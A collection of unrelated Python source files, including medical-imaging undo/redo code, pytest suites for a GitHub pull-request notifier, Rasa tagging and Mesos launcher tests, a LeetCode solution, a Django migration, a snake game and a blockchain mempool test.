if not structureVolume:
EditUtil.addStructure( masterNode, mergeNode, index )
structureVolume = EditUtil.structureVolume( masterNode, structureName )
structureVolume.GetImageData().DeepCopy( thresholder.GetOutput() )
EditUtil.markVolumeNodeAsModified(structureVolume)
class UndoRedo(object):
""" Code to manage a list of undo/redo volumes
stored in a compressed format using the vtkImageStash
class to compress label maps in a thread
"""
class checkPoint(object):
"""Internal class to store one checkpoint
step consisting of the stashed data
and the volumeNode it corresponds to
"""
def __init__(self,volumeNode):
self.volumeNode = volumeNode
self.stashImage = vtk.vtkImageData()
self.stash = slicer.vtkImageStash()
self.stashImage.DeepCopy( volumeNode.GetImageData() )
self.stash.SetStashImage( self.stashImage )
self.stash.ThreadedStash()
def restore(self):
"""Unstash the volume but first check that the
stash operation is not still ongoing in the other thread.
TODO: the stash operation is deterministic, so there's
no chance of a deadlock here, but it would still be better
to integrate the wait into the event queue to avoid locking
the interface. In practice this would only happen if the user
clicks Undo while the thread is still executing, which is
unlikely. And at worst this busy loop will consume two threads
(this one and the stashing one) for the time the stash takes to complete.
"""
while self.stash.GetStashing():
pass
self.stash.Unstash()
self.volumeNode.GetImageData().DeepCopy( self.stashImage )
EditUtil().markVolumeNodeAsModified(self.volumeNode)
def __init__(self,undoSize=100):
self.enabled = True
self.undoSize = undoSize
self.undoList = []
self.redoList = []
self.undoObservers = []
self.redoObservers = []
self.stateChangedCallback = self.defaultStateChangedCallback
def defaultStateChangedCallback(self):
"""placeholder so that using class can define a callable
for when the state of the stacks changes (e.g. for updating the
enable state of menu items or buttons)"""
pass
def addUndoObserver(self, observer):
"""observer is a callable to be invoked when an undo operation
is selected"""
self.undoObservers.append(observer)
def addRedoObserver(self, observer):
"""observer is a callable to be invoked when an redo operation
is selected"""
self.redoObservers.append(observer)
def removeUndoObserver(self, observer):
"""observer is a callable to be removed from the list"""
self.undoObservers.remove(observer)
def removeRedoObserver(self, observer):
"""observer is a callable to be removed from the list"""
self.redoObservers.remove(observer)
def undoEnabled(self):
"""for managing undo/redo button state"""
return self.enabled and self.undoList != []
def redoEnabled(self):
"""for managing undo/redo button state"""
return self.enabled and self.redoList != []
def storeVolume(self,checkPointList,volumeNode):
""" Internal helper function
Save a stashed copy of the given volume node into
the passed list (could be undo or redo list)
"""
if not self.enabled or not volumeNode or not volumeNode.GetImageData():
return
checkPointList.append( self.checkPoint(volumeNode) )
self.stateChangedCallback()
if len(checkPointList) >= self.undoSize:
return( checkPointList[1:] )
else:
return( checkPointList )
def saveState(self):
"""Called by effects as they modify the label volume node
"""
# store current state onto undoList
self.undoList = self.storeVolume( self.undoList, EditUtil.getLabelVolume() )
self.redoList = []
self.stateChangedCallback()
def undo(self):
"""Perform the operation when the user presses
the undo button on the editor interface.
This pushes the current state onto the redoList and
removes a volume from the undoList.
"""
if self.undoList == []:
return
# store current state onto redoList
self.redoList = self.storeVolume( self.redoList, EditUtil.getLabelVolume() )
# get the checkPoint to restore and remove it from the list
self.undoList[-1].restore()
self.undoList = self.undoList[:-1]
self.stateChangedCallback()
for observer in self.undoObservers:
observer()
def redo(self):
"""Perform the operation when the user presses
the undo button on the editor interface.
This pushes the current state onto the undo stack
and restores the state from the redo stack
"""
if self.redoList == []:
return
# store current state onto undoList
self.undoList = self.storeVolume( self.undoList, EditUtil.getLabelVolume() )
# get the checkPoint to restore and remove it from the list
self.redoList[-1].restore()
self.redoList = self.redoList[:-1]
self.stateChangedCallback()
for observer in self.redoObservers:
observer()
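# Illustrative usage of UndoRedo (a sketch; the surrounding editor wiring is
# assumed, not shown in this file):
#     undoRedo = UndoRedo(undoSize=10)
#     undoRedo.saveState()   # snapshot the label volume before an effect runs
#     ...                    # the effect modifies the label map
#     undoRedo.undo()        # restore the snapshot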
|
py | b40b1c6b53959df4ac8f8a7e4138a8198927a5a5 | import mock
import pytest
import requests
from pullbug.github_bug import GithubBug
@pytest.fixture
def _mock_github_token():
return '123'
@pytest.fixture
def _mock_user():
return 'mock-user'
@pytest.fixture
def _mock_github_context():
return 'users'
@pytest.fixture
def _mock_github_state():
return 'open'
@pytest.fixture
def _mock_repo():
mock_repo = {
'name': 'mock-repo'
}
return mock_repo
@pytest.fixture
def _mock_pull_request(_mock_user, _mock_repo):
mock_pull_request = {
'title': 'mock-pull-request',
'description': 'Mock description',
'assignees': [
{
'login': _mock_user,
'html_url': f'https://github.com/{_mock_user}'
},
],
'body': 'Mock body of a pull request.',
'html_url': f'https://github.com/{_mock_user}/{_mock_repo}/pull/1'
}
return mock_pull_request
@mock.patch('pullbug.cli.GITHUB_TOKEN', '123')
@mock.patch('pullbug.github_bug.GithubBug.get_pull_requests')
@mock.patch('pullbug.github_bug.GithubBug.get_repos')
@mock.patch('pullbug.github_bug.LOGGER')
def test_run_success(mock_logger, mock_get_repos, mock_pull_request):
GithubBug.run('mock-owner', 'open', 'orgs', False, False, False)
mock_get_repos.assert_called_once()
mock_pull_request.assert_called_once()
mock_logger.info.assert_called()
@mock.patch('pullbug.cli.GITHUB_TOKEN', '123')
@mock.patch('pullbug.github_bug.GithubBug.iterate_pull_requests')
@mock.patch('pullbug.github_bug.GithubBug.get_pull_requests', return_value=[])
@mock.patch('pullbug.github_bug.GithubBug.get_repos')
@mock.patch('pullbug.github_bug.LOGGER')
def test_run_no_pull_requests(mock_logger, mock_get_repos, mock_pull_request, mock_iterate_pull_requests):
GithubBug.run('mock-owner', 'open', 'orgs', False, False, False)
mock_get_repos.assert_called_once()
mock_iterate_pull_requests.assert_not_called()
mock_logger.info.assert_called()
@mock.patch('pullbug.cli.GITHUB_TOKEN', '123')
@mock.patch('pullbug.messages.Messages.slack')
@mock.patch('pullbug.github_bug.GithubBug.get_pull_requests')
@mock.patch('pullbug.github_bug.GithubBug.get_repos')
@mock.patch('pullbug.github_bug.LOGGER')
def test_run_with_slack(mock_logger, mock_get_repos, mock_pull_request, mock_slack):
GithubBug.run('mock-owner', 'open', 'orgs', False, True, False)
mock_get_repos.assert_called_once()
mock_pull_request.assert_called_once()
mock_slack.assert_called_once()
mock_logger.info.assert_called()
@mock.patch('pullbug.cli.GITHUB_TOKEN', '123')
@mock.patch('pullbug.messages.Messages.rocketchat')
@mock.patch('pullbug.github_bug.GithubBug.get_pull_requests')
@mock.patch('pullbug.github_bug.GithubBug.get_repos')
@mock.patch('pullbug.github_bug.LOGGER')
def test_run_with_rocketchat(mock_logger, mock_get_repos, mock_pull_request, mock_rocketchat):
GithubBug.run('mock-owner', 'open', 'orgs', False, False, True)
mock_get_repos.assert_called_once()
mock_pull_request.assert_called_once()
mock_rocketchat.assert_called_once()
mock_logger.info.assert_called()
@mock.patch('pullbug.github_bug.GITHUB_TOKEN', '123')
@mock.patch('pullbug.github_bug.GITHUB_HEADERS')
@mock.patch('pullbug.github_bug.LOGGER')
@mock.patch('requests.get')
def test_get_repos_success(mock_request, mock_logger, mock_headers, _mock_user, _mock_github_context):
# TODO: Mock this request better and assert additional values
GithubBug.get_repos(_mock_user, _mock_github_context)
mock_request.assert_called_once_with(
f'https://api.github.com/{_mock_github_context}/{_mock_user}/repos?per_page=100',
headers=mock_headers
)
assert mock_logger.info.call_count == 2
@mock.patch('pullbug.github_bug.LOGGER')
@mock.patch('requests.get', side_effect=requests.exceptions.RequestException('mock-error'))
def test_get_repos_exception(mock_request, mock_logger, _mock_user, _mock_github_context):
with pytest.raises(requests.exceptions.RequestException):
GithubBug.get_repos(_mock_user, _mock_github_context)
mock_logger.error.assert_called_once_with(
'Could not retrieve GitHub repos: mock-error'
)
@mock.patch('pullbug.github_bug.GITHUB_TOKEN', '123')
@mock.patch('pullbug.github_bug.GITHUB_HEADERS')
@mock.patch('pullbug.github_bug.LOGGER')
@mock.patch('requests.get')
def test_get_pull_requests_success(mock_request, mock_logger, mock_headers, _mock_user, _mock_repo, _mock_github_state):
# TODO: Mock this request better and assert additional values
mock_repos = [_mock_repo]
result = GithubBug.get_pull_requests(mock_repos, _mock_user, _mock_github_state)
mock_request.assert_called_once_with(
f'https://api.github.com/repos/{_mock_user}/{_mock_repo["name"]}/pulls?state={_mock_github_state}&per_page=100',
headers=mock_headers
)
assert mock_logger.info.call_count == 2
assert isinstance(result, list)
@mock.patch('pullbug.github_bug.LOGGER')
@mock.patch('requests.get', side_effect=requests.exceptions.RequestException('mock-error'))
def test_get_pull_requests_request_exception(mock_request, mock_logger, _mock_repo, _mock_user, _mock_github_state):
mock_repos = [_mock_repo]
with pytest.raises(requests.exceptions.RequestException):
GithubBug.get_pull_requests(mock_repos, _mock_user, _mock_github_state)
mock_logger.error.assert_called_once_with(
f'Could not retrieve GitHub pull requests for {_mock_repo["name"]}: mock-error'
)
@mock.patch('pullbug.github_bug.LOGGER')
@mock.patch('requests.get', side_effect=TypeError('mock-error'))
def test_get_pull_requests_type_error_exception(mock_request, mock_logger, _mock_repo, _mock_user, _mock_github_state):
mock_repos = [_mock_repo]
with pytest.raises(TypeError):
GithubBug.get_pull_requests(mock_repos, _mock_user, _mock_github_state)
mock_logger.error.assert_called_once_with(
f'Could not retrieve GitHub pull requests due to bad parameter: {_mock_user} | {_mock_github_state}.'
)
@mock.patch('pullbug.github_bug.GithubBug.prepare_message')
def test_iterate_pull_requests_wip_title(mock_prepare_message, _mock_pull_request):
_mock_pull_request['title'] = 'wip: mock-pull-request'
mock_pull_requests = [_mock_pull_request]
GithubBug.iterate_pull_requests(mock_pull_requests, True)
mock_prepare_message.assert_called_once()
@mock.patch('pullbug.github_bug.GithubBug.prepare_message')
def test_iterate_pull_requests_wip_setting_absent(mock_prepare_message, _mock_pull_request):
_mock_pull_request['title'] = 'wip: mock-pull-request'
mock_pull_requests = [_mock_pull_request]
GithubBug.iterate_pull_requests(mock_pull_requests, False)
mock_prepare_message.assert_not_called()
def test_prepare_message(_mock_pull_request, _mock_user, _mock_repo):
result = GithubBug.prepare_message(_mock_pull_request)
assert 'Pull Request' in result
assert f'{_mock_pull_request["assignees"][0]["html_url"]}|{_mock_pull_request["assignees"][0]["login"]}' in result
assert f'{_mock_pull_request["html_url"]}|{_mock_pull_request["title"]}' in result
def test_prepare_message_no_assignees_data(_mock_pull_request):
_mock_pull_request['assignees'][0]['login'] = None
result = GithubBug.prepare_message(_mock_pull_request)
assert '*Waiting on:* No assignee' in result
def test_prepare_message_no_assignee(_mock_pull_request):
_mock_pull_request['assignees'] = []
result = GithubBug.prepare_message(_mock_pull_request)
assert '*Waiting on:* No assignee' in result
|
py | b40b1d7cfce09d0dcb8983fe777d518aea421b6a | '''
From: LeetCode - 438. Find All Anagrams in a String
Level: Easy
Source: https://leetcode.com/problems/find-all-anagrams-in-a-string/description/
Status: TLE
Solution: Using Brute Force
'''
class Solution(object):
def findAnagrams(self, s, p):
"""
:type s: str
:type p: str
:rtype: List[int]
"""
if not s or not p:
return []
dicts = {c: p.count(c) for c in p}
end = len(s) - len(p) + 1
result = []
i = 0
while i < end:
dic = dicts.copy()
for j in range(i, i+len(p)):
if s[j] not in dic.keys():
dic[s[j]] = -1
i = j
break
elif dic[s[j]] == 0:
dic[s[j]] = -1
break
else:
dic[s[j]] -= 1
# print(dic)
if -1 not in dic.values():
result.append(i)
i += 1
return result
# time: O(n^2)
# space: O(n)
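# Illustrative check (example input taken from the problem statement):
#     >>> Solution().findAnagrams("cbaebabacd", "abc")
#     [0, 6]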
'''
Most Optimal Answer: Sliding window
class Solution(object):
def findAnagrams(self, s, p):
"""
:type s: str
:type p: str
:rtype: List[int]
"""
result = []
if len(p) > len(s):
return result
begin, end, length = 0, 0, len(s)
dic = {c: p.count(c) for c in p}
count = len(dic.keys())
while end < length:
c = s[end]
if c in dic.keys():
dic[c] -= 1
if dic[c] == 0:
count -= 1
end += 1
while count == 0:
ch = s[begin]
if ch in dic:
dic[ch] += 1
if dic[ch] > 0:
count += 1
if end - begin == len(p):
result.append(begin)
begin += 1
return result
# time: O(n)
# space: O(n)
''' |
py | b40b1d979380c2bfaaaa0292acc222c650bbfc12 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Source'
db.create_table(u'thumbnails_source', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=255)),
))
db.send_create_signal(u'thumbnails', ['Source'])
# Adding model 'ThumbnailMeta'
db.create_table(u'thumbnails_thumbnailmeta', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('source', self.gf('django.db.models.fields.related.ForeignKey')(related_name='thumbnails', to=orm['thumbnails.Source'])),
('size', self.gf('django.db.models.fields.CharField')(max_length=64)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=255)),
))
db.send_create_signal(u'thumbnails', ['ThumbnailMeta'])
# Adding unique constraint on 'ThumbnailMeta', fields ['source', 'size']
db.create_unique(u'thumbnails_thumbnailmeta', ['source_id', 'size'])
def backwards(self, orm):
# Removing unique constraint on 'ThumbnailMeta', fields ['source', 'size']
db.delete_unique(u'thumbnails_thumbnailmeta', ['source_id', 'size'])
# Deleting model 'Source'
db.delete_table(u'thumbnails_source')
# Deleting model 'ThumbnailMeta'
db.delete_table(u'thumbnails_thumbnailmeta')
models = {
u'thumbnails.source': {
'Meta': {'object_name': 'Source'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
},
u'thumbnails.thumbnailmeta': {
'Meta': {'unique_together': "(('source', 'size'),)", 'object_name': 'ThumbnailMeta'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'size': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'thumbnails'", 'to': u"orm['thumbnails.Source']"})
}
}
complete_apps = ['thumbnails'] |
py | b40b1ec3021977c51c067d40ef4eecd04f1c3331 | import abc
import builtins
import datetime
import enum
import typing
import jsii
import publication
import typing_extensions
import aws_cdk.aws_autoscaling_common._jsii
import aws_cdk.aws_cloudwatch._jsii
import aws_cdk.aws_ec2._jsii
import aws_cdk.aws_elasticloadbalancing._jsii
import aws_cdk.aws_elasticloadbalancingv2._jsii
import aws_cdk.aws_iam._jsii
import aws_cdk.aws_sns._jsii
import aws_cdk.core._jsii
import constructs._jsii
__jsii_assembly__ = jsii.JSIIAssembly.load(
"@aws-cdk/aws-autoscaling",
"1.118.0",
__name__[0:-6],
"[email protected]",
)
__all__ = [
"__jsii_assembly__",
]
publication.publish()
|
py | b40b201b2db21c47ade854172efe79f336a980da | import logging
from typing import Text, List, Optional
from _pytest.logging import LogCaptureFixture
import pytest
from rasa.nlu.tokenizers.whitespace_tokenizer import WhitespaceTokenizer
import rasa.nlu.utils.bilou_utils as bilou_utils
from rasa.nlu.constants import BILOU_ENTITIES
from rasa.shared.nlu.constants import ENTITIES
from rasa.shared.nlu.training_data.training_data import TrainingData
from rasa.shared.nlu.training_data.message import Message
@pytest.mark.parametrize(
"tag, expected",
[
("B-person", "person"),
("I-location", "location"),
("location", "location"),
("U-company", "company"),
("L-company", "company"),
],
)
def test_entity_name_from_tag(tag, expected):
actual = bilou_utils.tag_without_prefix(tag)
assert actual == expected
@pytest.mark.parametrize(
"tag, expected",
[
("B-person", "B-"),
("I-location", "I-"),
("location", None),
("U-company", "U-"),
("L-company", "L-"),
("O-company", None),
],
)
def test_bilou_from_tag(tag, expected):
actual = bilou_utils.bilou_prefix_from_tag(tag)
assert actual == expected
def test_tags_to_ids():
message = Message.build(text="Germany is part of the European Union")
message.set(
BILOU_ENTITIES,
["U-location", "O", "O", "O", "O", "B-organisation", "L-organisation"],
)
tag_id_dict = {"O": 0, "U-location": 1, "B-organisation": 2, "L-organisation": 3}
tags = bilou_utils.bilou_tags_to_ids(message, tag_id_dict)
assert tags == [1, 0, 0, 0, 0, 2, 3]
def test_build_tag_id_dict():
message_1 = Message.build(
text="Germany is part of the European Union", intent="inform"
)
message_1.set(
BILOU_ENTITIES,
["U-location", "O", "O", "O", "O", "B-organisation", "L-organisation"],
)
message_2 = Message.build(text="Berlin is the capital of Germany", intent="inform")
message_2.set(BILOU_ENTITIES, ["U-location", "O", "O", "O", "O", "U-location"])
training_data = TrainingData([message_1, message_2])
tag_id_dict = bilou_utils.build_tag_id_dict(training_data)
assert tag_id_dict == {
"O": 0,
"B-location": 1,
"I-location": 2,
"L-location": 3,
"U-location": 4,
"B-organisation": 5,
"I-organisation": 6,
"L-organisation": 7,
"U-organisation": 8,
}
def test_apply_bilou_schema(whitespace_tokenizer: WhitespaceTokenizer):
message_1 = Message.build(
text="Germany is part of the European Union", intent="inform"
)
message_1.set(
ENTITIES,
[
{"start": 0, "end": 7, "value": "Germany", "entity": "location"},
{
"start": 23,
"end": 37,
"value": "European Union",
"entity": "organisation",
},
],
)
message_2 = Message.build(text="Berlin is the capital of Germany", intent="inform")
message_2.set(
ENTITIES,
[
{"start": 0, "end": 6, "value": "Berlin", "entity": "location"},
{"start": 25, "end": 32, "value": "Germany", "entity": "location"},
],
)
training_data = TrainingData([message_1, message_2])
whitespace_tokenizer.process_training_data(training_data)
bilou_utils.apply_bilou_schema(training_data)
assert message_1.get(BILOU_ENTITIES) == [
"U-location",
"O",
"O",
"O",
"O",
"B-organisation",
"L-organisation",
]
assert message_2.get(BILOU_ENTITIES) == [
"U-location",
"O",
"O",
"O",
"O",
"U-location",
]
@pytest.mark.parametrize(
"tags, confidences, expected_tags, expected_confidences, debug_message",
[
(
["O", "B-person", "I-person", "L-person", "O", "U-person", "O"],
[0.99, 0.89, 0.93, 0.99, 0.89, 0.97, 0.87],
["O", "B-person", "I-person", "L-person", "O", "U-person", "O"],
[0.99, 0.89, 0.93, 0.99, 0.89, 0.97, 0.87],
None,
),
(
["O", "B-person", "B-location", "I-location", "O"],
[0.99, 0.89, 0.93, 0.78, 0.89],
["O", "U-person", "B-location", "L-location", "O"],
[0.99, 0.89, 0.93, 0.78, 0.89],
"B- tag not closed",
),
(
["O", "B-person", "I-location", "L-person"],
[0.99, 0.89, 0.77, 0.87],
["O", "B-person", "I-person", "L-person"],
[0.99, 0.89, 0.76, 0.87],
"B- tag, L- tag pair encloses multiple entity classes",
),
(
["O", "B-person", "I-location", "L-location"],
[0.99, 0.78, 0.93, 0.96],
["O", "B-location", "I-location", "L-location"],
[0.99, 0.79, 0.93, 0.96],
"B- tag, L- tag pair encloses multiple entity classes",
),
(
["O", "B-person", "I-location", "L-location"],
[0.99, 0.99, 0.77, 0.77],
["O", "B-location", "I-location", "L-location"],
[0.99, 0.72, 0.77, 0.77],
"B- tag, L- tag pair encloses multiple entity classes",
),
(
["O", "B-person", "I-location", "L-location", "B-person", "L-person"],
[0.99, 0.78, 0.93, 0.96, 0.93, 0.96],
["O", "B-location", "I-location", "L-location", "B-person", "L-person"],
[0.99, 0.79, 0.93, 0.96, 0.93, 0.96],
"B- tag, L- tag pair encloses multiple entity classes",
),
(
["O", "B-person", "O"],
[0.99, 0.89, 0.87],
["O", "U-person", "O"],
[0.99, 0.89, 0.87],
"B- tag not closed",
),
(
["O", "B-person"],
[0.99, 0.89],
["O", "U-person"],
[0.99, 0.89],
"B- tag not closed",
),
(
["O", "B-person", "I-person"],
[0.99, 0.89, 0.87],
["O", "B-person", "L-person"],
[0.99, 0.89, 0.87],
"B- tag not closed",
),
(
["O", "B-person", "I-location"],
[0.99, 0.89, 0.78],
["O", "B-person", "L-person"],
[0.99, 0.89, 0.64],
"B- tag not closed",
),
(
["O", "B-person", "B-location"],
[0.99, 0.89, 0.89],
["O", "U-person", "U-location"],
[0.99, 0.89, 0.89],
"B- tag not closed",
),
],
)
def test_check_consistent_bilou_tagging(
tags: List[Text],
confidences: List[float],
expected_tags: List[Text],
expected_confidences: List[float],
debug_message: Optional[Text],
caplog: LogCaptureFixture,
):
with caplog.at_level(logging.DEBUG):
actual_tags, actual_confidences = bilou_utils.ensure_consistent_bilou_tagging(
tags, confidences
)
if debug_message:
assert len(caplog.records) > 0
assert debug_message in caplog.text
else:
assert len(caplog.records) == 0
assert actual_tags == expected_tags
assert actual_confidences == expected_confidences
|
py | b40b2139d6cd7e219dfc3525517994463ac91e58 | import subprocess
import sys
import random
from enum import Enum
from getkey import getkey, keys
class Direction(Enum):
UP = (-1, 0)
DOWN = (1, 0)
RIGHT = (0, 1)
LEFT = (0, -1)
def __init__(self, x, y):
self.x = x
self.y = y
def __getitem__(self, index):
return self.value[index]
def is_opposite_of(self, other):
return self.x == (-1 * other.x) and self.y == (-1 * other.y)
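# Illustrative checks (a sketch, not part of the original file):
#     >>> Direction.UP.is_opposite_of(Direction.DOWN)
#     True
#     >>> Direction.UP.is_opposite_of(Direction.LEFT)
#     False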
def clear_screen():
subprocess.call('clear', shell=True)
def read_key(valid_keys=[keys.UP, keys.LEFT, keys.RIGHT, keys.DOWN]):
key = getkey()
while key not in valid_keys:
key = getkey()
return key
class Snake:
def __init__(self, initial_body):
self.body = initial_body
@property
def head(self):
return self.body[-1]
def move(self, direction):
self.grow(direction)
self.body = self.body[1:]
def grow(self, direction):
new_head = [self.head[0] + direction[0], self.head[1] + direction[1]]
self.body.append(new_head)
class Game:
SNAKE_BODY_PART = "*"
SNAKE_HEAD = "@"
FOOD = "+"
EMPTY_SPACE = " "
def __init__(self, size, snake, initial_direction):
self.size = size
self.snake = snake
self.snake_direction = initial_direction
self.food = self.__new_food()
self.board = []
for i in range(size):
columns = []
for i in range(size):
columns.append(Game.EMPTY_SPACE)
self.board.append(columns)
def play(self):
while True:
clear_screen()
self.__render_board()
key_press = read_key()
next_direction = self.__get_move_direction(key_press)
if next_direction.is_opposite_of(self.snake_direction):
continue
self.snake_direction = next_direction
self.snake.move(next_direction)
if self.food == self.snake.head:
self.snake.grow(next_direction)
self.food = self.__new_food()
if self.__is_outside_of_board():
break
print("Game over!")
def __render_board(self):
for i in range(self.size):
for j in range(self.size):
symbol = self.board[i][j]
if self.__is_snake_body_part([i, j]):
symbol = Game.SNAKE_BODY_PART
elif self.__is_snake_head([i, j]):
symbol = Game.SNAKE_HEAD
elif self.__is_food([i, j]):
symbol = Game.FOOD
print("[{}]".format(symbol), end='')
print()
print()
def __get_move_direction(self, key_press):
if key_press == keys.UP:
return Direction.UP
elif key_press == keys.DOWN:
return Direction.DOWN
elif key_press == keys.LEFT:
return Direction.LEFT
elif key_press == keys.RIGHT:
return Direction.RIGHT
def __new_food(self):
cells = []
for i in range(self.size):
for j in range(self.size):
if [i, j] not in self.snake.body:
cells.append([i, j])
return random.choice(cells)
def __is_outside_of_board(self):
head = self.snake.head
return (head[0] < 0 or head[0] > self.size - 1) or \
(head[1] < 0 or head[1] > self.size - 1)
def __is_snake_body_part(self, pos):
return pos in self.snake.body and not self.__is_snake_head(pos)
def __is_snake_head(self, pos):
return pos == self.snake.head
def __is_food(self, pos):
return pos == self.food
if __name__ == "__main__":
snake = Snake([[5, 4], [4, 4], [3, 4]])
game = Game(10, snake, Direction.UP)
game.play()
|
py | b40b21c6842eb9d912242c2a3437bd2cc8e7e667 | from ReHistoGAN.rehistoGAN import recoloringTrainer
|
py | b40b23ab4d69cdfef0c0e301c6172dd56cd8d54a | #!/usr/bin/env python3
# Copyright (c) 2014-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test resurrection of mined transactions when the blockchain is re-organized."""
from test_framework.blocktools import create_raw_transaction
from test_framework.test_framework import VEKTORCOINTestFramework
from test_framework.util import assert_equal
class MempoolCoinbaseTest(VEKTORCOINTestFramework):
def set_test_params(self):
self.num_nodes = 1
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
node0_address = self.nodes[0].getnewaddress()
# Spend block 1/2/3's coinbase transactions
# Mine a block.
# Create three more transactions, spending the spends
# Mine another block.
# ... make sure all the transactions are confirmed
# Invalidate both blocks
# ... make sure all the transactions are put back in the mempool
# Mine a new block
# ... make sure all the transactions are confirmed again.
b = [self.nodes[0].getblockhash(n) for n in range(1, 4)]
coinbase_txids = [self.nodes[0].getblock(h)['tx'][0] for h in b]
spends1_raw = [create_raw_transaction(self.nodes[0], txid, node0_address, amount=49.99) for txid in coinbase_txids]
spends1_id = [self.nodes[0].sendrawtransaction(tx) for tx in spends1_raw]
blocks = []
blocks.extend(self.nodes[0].generate(1))
spends2_raw = [create_raw_transaction(self.nodes[0], txid, node0_address, amount=49.98) for txid in spends1_id]
spends2_id = [self.nodes[0].sendrawtransaction(tx) for tx in spends2_raw]
blocks.extend(self.nodes[0].generate(1))
# mempool should be empty, all txns confirmed
assert_equal(set(self.nodes[0].getrawmempool()), set())
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert(tx["confirmations"] > 0)
# Use invalidateblock to re-org back
for node in self.nodes:
node.invalidateblock(blocks[0])
# All txns should be back in mempool with 0 confirmations
assert_equal(set(self.nodes[0].getrawmempool()), set(spends1_id+spends2_id))
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert(tx["confirmations"] == 0)
# Generate another block, they should all get mined
self.nodes[0].generate(1)
# mempool should be empty, all txns confirmed
assert_equal(set(self.nodes[0].getrawmempool()), set())
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert(tx["confirmations"] > 0)
if __name__ == '__main__':
MempoolCoinbaseTest().main()
|
py | b40b23db4197dc1ef2c868c52babb9a3b3fef6d2 | import json
import os
import shutil
import tempfile
import threading
from mysos.common.cluster import get_cluster_path, wait_for_master
from mysos.common.testing import Fake
from mysos.scheduler.launcher import create_resources, MySQLClusterLauncher
from mysos.scheduler.password import gen_encryption_key, PasswordBox
from mysos.scheduler.scheduler import DEFAULT_TASK_CPUS, DEFAULT_TASK_MEM, DEFAULT_TASK_DISK
from mysos.scheduler.state import LocalStateProvider, MySQLCluster
from mysos.scheduler.zk_state import ZooKeeperStateProvider
from kazoo.handlers.threading import SequentialThreadingHandler
import mesos.interface.mesos_pb2 as mesos_pb2
from twitter.common import log
from twitter.common.concurrent import deadline
from twitter.common.quantity import Amount, Data, Time
from zake.fake_client import FakeClient
from zake.fake_storage import FakeStorage
import pytest
if 'MYSOS_DEBUG' in os.environ:
from twitter.common.log.options import LogOptions
LogOptions.set_stderr_log_level('google:DEBUG')
LogOptions.set_simple(True)
log.init('mysos_tests')
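# Setting MYSOS_DEBUG (to any value) in the environment turns on verbose
# DEBUG-level logging for these tests.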
class FakeDriver(Fake): pass
class TestLauncher(object):
@pytest.fixture(params=[LocalStateProvider, ZooKeeperStateProvider], autouse=True)
def setup(self, request):
self._driver = FakeDriver()
self._storage = FakeStorage(SequentialThreadingHandler())
self._zk_client = FakeClient(storage=self._storage)
self._zk_client.start()
self._offer = mesos_pb2.Offer()
self._offer.id.value = "offer_id_0"
self._offer.framework_id.value = "framework_id_0"
self._offer.slave_id.value = "slave_id_0"
self._offer.hostname = "localhost"
# Enough resources to fit three tasks.
resources = create_resources(
cpus=DEFAULT_TASK_CPUS * 3,
mem=DEFAULT_TASK_MEM * 3,
disk=DEFAULT_TASK_DISK * 3,
ports=set([10000, 10001, 10002]))
self._offer.resources.extend(resources)
self._framework_user = "framework_user"
# Some tests use the default launcher; some don't.
self._zk_url = "zk://host/mysos/test"
self._scheduler_key = gen_encryption_key()
self._password_box = PasswordBox(self._scheduler_key)
self._cluster = MySQLCluster(
"cluster0",
"user",
self._password_box.encrypt("pass"),
3,
DEFAULT_TASK_CPUS,
DEFAULT_TASK_MEM,
DEFAULT_TASK_DISK)
# Construct the state provider based on the test parameter.
if request.param == LocalStateProvider:
tmpdir = tempfile.mkdtemp()
self._state_provider = LocalStateProvider(tmpdir)
request.addfinalizer(lambda: shutil.rmtree(tmpdir, True)) # Clean up after ourselves.
elif request.param == ZooKeeperStateProvider:
self._state_provider = ZooKeeperStateProvider(self._zk_client, "/mysos/test")
self._launcher = MySQLClusterLauncher(
self._driver,
self._cluster,
self._state_provider,
self._zk_url,
self._zk_client,
self._framework_user,
"./executor.pex",
"cmd.sh",
Amount(5, Time.SECONDS),
"/etc/mysos/admin_keyfile.yml",
self._scheduler_key,
query_interval=Amount(150, Time.MILLISECONDS)) # Short interval.
self._elected = threading.Event()
self._launchers = [self._launcher] # See teardown().
request.addfinalizer(self.teardown)
def teardown(self):
for launcher in self._launchers:
if launcher._elector:
launcher._elector.abort() # Abort the thread even if the election is pending.
launcher._elector.join()
def test_launch_cluster_all_nodes_successful(self):
for i in range(self._cluster.num_nodes):
task_id, remaining = self._launcher.launch(self._offer)
del self._offer.resources[:]
self._offer.resources.extend(remaining)
assert task_id == "mysos-cluster0-%s" % i
tasks = self._driver.method_calls["launchTasks"]
assert len(tasks) == self._cluster.num_nodes
# No new tasks are launched.
assert self._launcher.launch(self._offer)[0] is None
assert len(self._driver.method_calls["launchTasks"]) == self._cluster.num_nodes
# All 3 nodes have successfully started.
status = mesos_pb2.TaskStatus()
status.state = mesos_pb2.TASK_RUNNING # Valid state.
status.slave_id.value = self._offer.slave_id.value
for i in range(self._cluster.num_nodes):
status.task_id.value = "mysos-cluster0-%s" % i
self._launcher.status_update(status)
deadline(
lambda: wait_for_master(
get_cluster_path(self._zk_url, self._cluster.name),
self._zk_client),
Amount(5, Time.SECONDS))
# The first slave is elected.
assert "/mysos/test/cluster0/master/member_0000000000" in self._storage.paths
# Two slaves.
assert len([x for x in self._storage.paths.keys() if x.startswith(
"/mysos/test/cluster0/slaves/member_")]) == 2
def test_launch_cluster_insufficient_resources(self):
"""All but one slave in the slave are launched successfully."""
